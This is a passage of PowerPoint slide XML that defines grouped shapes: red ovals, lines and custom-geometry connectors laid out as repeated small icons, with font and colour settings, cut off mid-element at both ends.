          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36176"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solidFill>
                    <a:schemeClr val="tx2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36177"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chemeClr val="tx2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36178"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chemeClr val="tx2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36192" name="Group 375"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="52" y="2922"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36173"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solidFill>
                    <a:schemeClr val="tx2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36174"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chemeClr val="tx2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36175"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chemeClr val="tx2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36168"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chemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36169"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chemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36170"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chemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36171"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chemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36172"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solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36193" name="Group 522"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9355191" y="1426846"/>
            <a:ext cx="543806" cy="582930"/>
            <a:chOff x="4" y="2581"/>
            <a:chExt cx="222" cy="219"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36205" name="Group 523"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4" y="2637"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36163"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64"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65"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206" name="Group 527"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4" y="2624"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36160"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61"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62"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55"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6"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7"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8"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9"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6218" name="Group 370"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9400904" y="1507810"/>
            <a:ext cx="313331" cy="269557"/>
            <a:chOff x="52" y="2901"/>
            <a:chExt cx="145" cy="125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36219" name="Group 371"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="52" y="2937"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36150"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51"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52"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231" name="Group 375"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="52" y="2922"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36147"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48"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49"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42"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43"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44"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45"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46"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sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3859981" y="2526031"/>
            <a:ext cx="5090450" cy="1662113"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="770"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2359" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2359" h="770">
                <a:moveTo>
                  <a:pt x="0" y="770"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2359" y="0"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36232" name="Group 522"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="11589467" y="2237423"/>
            <a:ext cx="543806" cy="582930"/>
            <a:chOff x="4" y="2581"/>
            <a:chExt cx="222" cy="219"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36244" name="Group 523"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4" y="2637"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36137"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38"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39"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245" name="Group 527"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4" y="2624"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36134"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35"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36"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29"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30"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31"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32"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33"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6257" name="Group 370"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="11635178" y="2318385"/>
            <a:ext cx="313331" cy="269558"/>
            <a:chOff x="52" y="2901"/>
            <a:chExt cx="145" cy="125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36258" name="Group 371"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="52" y="2937"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36124"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25"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26"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270" name="Group 375"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="52" y="2922"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36121"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22"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23"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16"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17"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18"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19"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20"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36271" name="Group 522"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="12272319" y="3091816"/>
            <a:ext cx="543806" cy="582930"/>
            <a:chOff x="4" y="2581"/>
            <a:chExt cx="222" cy="219"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36283" name="Group 523"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4" y="2637"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36111"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12"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13"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284" name="Group 527"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4" y="2624"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36108"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09"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10"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03"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04"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05"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06"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07"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6296" name="Group 370"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="12318033" y="3172780"/>
            <a:ext cx="313333" cy="269557"/>
            <a:chOff x="52" y="2901"/>
            <a:chExt cx="145" cy="125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36297" name="Group 371"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="52" y="2937"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36098" name="Line 372"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="white">
              <a:xfrm flipH="1">
                <a:off x="164" y="1185"/>
                <a:ext cx="307" cy="96"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="76200">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36099" name="Oval 373"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="white">
              <a:xfrm>
                <a:off x="429" y="1152"/>
                <a:ext cx="51" cy="72"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ln w="76200">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00" name="Oval 374"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="white">
              <a:xfrm>
                <a:off x="144" y="1248"/>
                <a:ext cx="47" cy="72"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ln w="76200">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309" name="Group 375"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="52" y="2922"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36095" name="Line 376"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="white">
              <a:xfrm flipH="1">
                <a:off x="164" y="1185"/>
                <a:ext cx="307" cy="96"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="76200">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36096" name="Oval 377"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="white">
              <a:xfrm>
                <a:off x="429" y="1152"/>
                <a:ext cx="51" cy="72"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ln w="76200">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97" name="Oval 378"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="white">
              <a:xfrm>
                <a:off x="144" y="1248"/>
                <a:ext cx="47" cy="72"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ln w="76200">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090" name="Oval 379"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="99" y="2943"/>
              <a:ext cx="48" cy="83"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:ln w="76200">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91" name="Oval 380"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="82" y="2901"/>
              <a:ext cx="83" cy="83"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:ln w="76200">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92" name="Oval 381"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="99" y="2929"/>
              <a:ext cx="21" cy="28"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="76200">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93" name="Oval 382"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="129" y="2929"/>
              <a:ext cx="21" cy="28"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="76200">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94" name="Line 383"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="white">
            <a:xfrm>
              <a:off x="98" y="2984"/>
              <a:ext cx="51" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="76200">
              <a:noFill/>
              <a:prstDash val="sysDot"/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="333" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="20964075" flipV="1">
            <a:off x="4127274" y="3844272"/>
            <a:ext cx="3666201" cy="271922"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="2390" y="752"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2390" h="752">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2390" y="752"/>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334" name="Line 183"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="9157096" y="4911092"/>
            <a:ext cx="3308554" cy="811530"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="0" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="606" y="546"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="606" h="546">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="606" y="546"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36310" name="Group 522"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="12730412" y="2201230"/>
            <a:ext cx="543806" cy="582930"/>
            <a:chOff x="4" y="2581"/>
            <a:chExt cx="222" cy="219"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="256" name="Group 523"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4" y="2637"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36085"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86"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087"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57" name="Group 527"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4" y="2624"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36082"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83"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84"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077"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78"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79"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80"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81"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58" name="Group 370"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="12776125" y="2282190"/>
            <a:ext cx="313331" cy="269558"/>
            <a:chOff x="52" y="2901"/>
            <a:chExt cx="145" cy="125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="259" name="Group 371"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="52" y="2937"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36072"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73"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074"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60" name="Group 375"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="52" y="2922"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36069"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70"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71"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064"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65"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66"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67"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68"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="261" name="Group 522"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="11920892" y="1401130"/>
            <a:ext cx="543806" cy="582930"/>
            <a:chOff x="4" y="2581"/>
            <a:chExt cx="222" cy="219"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="262" name="Group 523"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4" y="2637"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36059"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60"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061"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63" name="Group 527"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4" y="2624"/>
              <a:ext cx="222" cy="169"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36056"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57"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58"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051"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52"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53"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54"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55"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64" name="Group 370"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="11966605" y="1482090"/>
            <a:ext cx="313331" cy="269558"/>
            <a:chOff x="52" y="2901"/>
            <a:chExt cx="145" cy="125"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="265" name="Group 371"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="52" y="2937"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36046"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47"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048"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66" name="Group 375"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="52" y="2922"/>
              <a:ext cx="145" cy="96"/>
              <a:chOff x="144" y="1152"/>
              <a:chExt cx="336" cy="168"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36043"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44"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45"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038"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39"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40"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41"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42"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="267" name="Group 522"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="13196124" y="2945132"/>
            <a:ext cx="543806" cy="582930"/>
            <a:chOff x="4" y="2581"/>
            <a:chExt cx="222" cy="219"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="268" name="Group 523"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4" y="2637"/>
              <a:ext cx="222" cy="169"/>
